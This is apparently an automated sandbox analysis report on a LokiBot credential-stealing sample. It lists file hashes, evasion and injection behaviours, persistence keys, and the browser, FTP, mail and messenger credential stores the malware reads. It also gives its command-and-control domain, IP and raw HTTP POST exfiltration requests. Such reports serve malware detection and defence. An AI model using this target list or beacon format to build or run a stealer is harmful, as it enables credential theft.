· 6 years ago · Sep 04, 2019, 12:56 AM
1
2* ID: 882
3* MalFamily: "Loki"
4
5* MalScore: 10.0
6
7* File Name: "Loki_a3b2bcb88650a5852ca8a0485391ce42.1"
8* File Size: 925696
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "af04fe80f80a0b0495958377aa099019d46890dd5fc79a5ea33c87ece98e90cd"
11* MD5: "a3b2bcb88650a5852ca8a0485391ce42"
12* SHA1: "305af5c09f5a3add010e1ee82250d24d310d630c"
13* SHA512: "d6222fa1bb03acd96c2e1cc2b7c6e2ef7749bcdd43ff038e7b429c42a14010adc1a25f78ef643e8e3aa942d9bfe5b318770ab76c756a52ef997a8127c7d88598"
14* CRC32: "CDF8A7A3"
15* SSDEEP: "1536:xOXjYijDzy0bBZI3uMaDvBj5QIZv/uyrszBBYb4VCCVVUjMQvEq2cAGMOyn6gCDp:I3og55QKv9b4PoLvh2cQ27eruRYK"
16
17* Process Execution:
18 "jD4OtDnr.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe"
25
26
27* Executed Commands:
28 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
29 "C:\\Users\\user\\subfolder\\filename.vbs ",
30 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
31 "C:\\Users\\user\\subfolder\\filename.exe ",
32 "C:\\Windows\\system32\\lsass.exe"
33
34
35* Signatures Detected:
36
37 "Description": "Behavioural detection: Executable code extraction",
38 "Details":
39
40
41 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
42 "Details":
43
44
45 "Description": "Possible date expiration check, exits too soon after checking local time",
46 "Details":
47
48 "process": "jD4OtDnr.exe, PID 1428"
49
50
51
52
53 "Description": "Detected script timer window indicative of sleep style evasion",
54 "Details":
55
56 "Window": "WSH-Timer"
57
58
59
60
61 "Description": "A process attempted to delay the analysis task.",
62 "Details":
63
64 "Process": "filename.exe tried to sleep 1624 seconds, actually delayed analysis time by 0 seconds"
65
66
67
68
69 "Description": "Reads data out of its own binary image",
70 "Details":
71
72 "self_read": "process: jD4OtDnr.exe, pid: 1428, offset: 0x00000000, length: 0x000e2000"
73
74
75 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00000000, length: 0x00000040"
76
77
78 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000000f0, length: 0x00000018"
79
80
81 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000001e8, length: 0x00000078"
82
83
84 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018000, length: 0x00000020"
85
86
87 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018058, length: 0x00000018"
88
89
90 "self_read": "process: wscript.exe, pid: 3816, offset: 0x000181a8, length: 0x00000018"
91
92
93 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018470, length: 0x00000010"
94
95
96 "self_read": "process: wscript.exe, pid: 3816, offset: 0x00018640, length: 0x00000012"
97
98
99
100
101 "Description": "A process created a hidden window",
102 "Details":
103
104 "Process": "jD4OtDnr.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
105
106
107 "Process": "jD4OtDnr.exe -> C:\\Users\\user\\subfolder\\filename.exe"
108
109
110
111
112 "Description": "HTTP traffic contains suspicious features which may be indicative of malware-related traffic",
113 "Details":
114
115 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
116
117
118 "http_version_old": "HTTP traffic uses version 1.0"
119
120
121 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
122
123
124
125
126 "Description": "Performs some HTTP requests",
127 "Details":
128
129 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
130
131
132
133
134 "Description": "A scripting utility was executed",
135 "Details":
136
137 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
138
139
140
141
142 "Description": "Sniffs keystrokes",
143 "Details":
144
145 "SetWindowsHookExW": "Process: explorer.exe(1884)"
146
147
148
149
150 "Description": "Behavioural detection: Injection (Process Hollowing)",
151 "Details":
152
153 "Injection": "filename.exe(2104) -> filename.exe(3292)"
154
155
156
157
158 "Description": "Executed a process and injected code into it, probably while unpacking",
159 "Details":
160
161 "Injection": "filename.exe(2104) -> filename.exe(3292)"
162
163
164
165
166 "Description": "Repeatedly calls a single API in order to delay analysis (API hammering)",
167 "Details":
168
169 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5126308 times"
170
171
172
173
174 "Description": "Steals private information from local Internet browsers",
175 "Details":
176
177 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
178
179
180
181
182 "Description": "Installs itself for autorun at Windows startup",
183 "Details":
184
185 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
186
187
188 "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz"
189
190
191
192
193 "Description": "Creates a hidden or system file",
194 "Details":
195
196 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
197
198
199 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
200
201
202
203
204 "Description": "CAPE detected the Loki malware family",
205 "Details":
206
207
208 "Description": "File has been identified as malicious by 17 antivirus engines on VirusTotal",
209 "Details":
210
211 "Malwarebytes": "Trojan.MalPack.VB.Generic"
212
213
214 "Invincea": "heuristic"
215
216
217 "F-Prot": "W32/VBKrypt.ZA.gen!Eldorado"
218
219
220 "Symantec": "ML.Attribute.HighConfidence"
221
222
223 "APEX": "Malicious"
224
225
226 "Paloalto": "generic.ml"
227
228
229 "Sophos": "Mal/FareitVB-N"
230
231
232 "FireEye": "Generic.mg.a3b2bcb88650a585"
233
234
235 "SentinelOne": "DFI - Suspicious PE"
236
237
238 "Cyren": "W32/VBKrypt.ZA.gen!Eldorado"
239
240
241 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
242
243
244 "Endgame": "malicious (high confidence)"
245
246
247 "Acronis": "suspicious"
248
249
250 "Cylance": "Unsafe"
251
252
253 "ESET-NOD32": "a variant of Win32/Injector.EHNM"
254
255
256 "Fortinet": "W32/Injector.EHNM!tr"
257
258
259 "CrowdStrike": "win/malicious_confidence_70% (W)"
260
261
262
263
264 "Description": "Creates a copy of itself",
265 "Details":
266
267 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
268
269
270 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
271
272
273
274
275 "Description": "Drops a binary and executes it",
276 "Details":
277
278 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
279
280
281
282
283 "Description": "Harvests credentials from locally installed FTP client software",
284 "Details":
285
286 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
287
288
289 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
290
291
292 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
293
294
295 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
296
297
298 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
299
300
301 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
302
303
304 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
305
306
307 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
308
309
310 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
311
312
313 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
314
315
316
317
318 "Description": "Harvests information related to installed instant messenger clients",
319 "Details":
320
321 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
322
323
324
325
326 "Description": "Harvests information related to installed mail clients",
327 "Details":
328
329 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
330
331
332 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
426
427
428 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
429
430
431 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
432
433
434
435
436 "Description": "Collects information to fingerprint the system",
437 "Details":
438
439
440 "Description": "Created network traffic indicative of malicious activity",
441 "Details":
442
443 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
444
445
446 "signature": "ET TROJAN LokiBot Fake 404 Response"
447
448
449 "signature": "ET TROJAN LokiBot Checkin"
450
451
452 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
453
454
455 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
456
457
458 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
459
460
461 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
462
463
464
465
466
467* Started Service:
468 "VaultSvc"
469
470
471* Mutexes:
472 "Local\\ZoneAttributeCacheCounterMutex",
473 "Local\\ZonesCacheCounterMutex",
474 "Local\\ZonesLockedCacheCounterMutex",
475 "6EFA73A4746045B65DEE781E"
476
477
478* Modified Files:
479 "C:\\Users\\user\\subfolder\\filename.exe",
480 "C:\\Users\\user\\subfolder\\filename.vbs",
481 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
482 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
483
484
485* Deleted Files:
486 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
487 "C:\\Users\\user\\subfolder\\filename.exe"
488
489
490* Modified Registry Keys:
491 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
492 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
493 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
494 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
495 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting",
496 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
497
498
499* Deleted Registry Keys:
500 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
501 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
502 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
503 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
504
505
506* DNS Communications:
507
508 "type": "A",
509 "request": "jiraiya.info",
510 "answers":
511
512 "data": "47.88.102.244",
513 "type": "A"
514
515
516
517
518
519* Domains:
520
521 "ip": "47.88.102.244",
522 "domain": "jiraiya.info"
523
524
525
526* Network Communication - ICMP:
527
528* Network Communication - HTTP:
529
530 "count": 2,
531 "body": "",
532 "uri": "http://jiraiya.info/joe23/five/fre.php",
533 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
534 "method": "POST",
535 "host": "jiraiya.info",
536 "version": "1.0",
537 "path": "/joe23/five/fre.php",
538 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
539 "port": 80
540
541
542 "count": 27,
543 "body": "",
544 "uri": "http://jiraiya.info/joe23/five/fre.php",
545 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
546 "method": "POST",
547 "host": "jiraiya.info",
548 "version": "1.0",
549 "path": "/joe23/five/fre.php",
550 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
551 "port": 80
552
553
554
555* Network Communication - SMTP:
556
557* Network Communication - Hosts:
558
559 "country_name": "United States",
560 "ip": "47.88.102.244",
561 "inaddrarpa": "",
562 "hostname": "jiraiya.info"
563
564
565
566* Network Communication - IRC: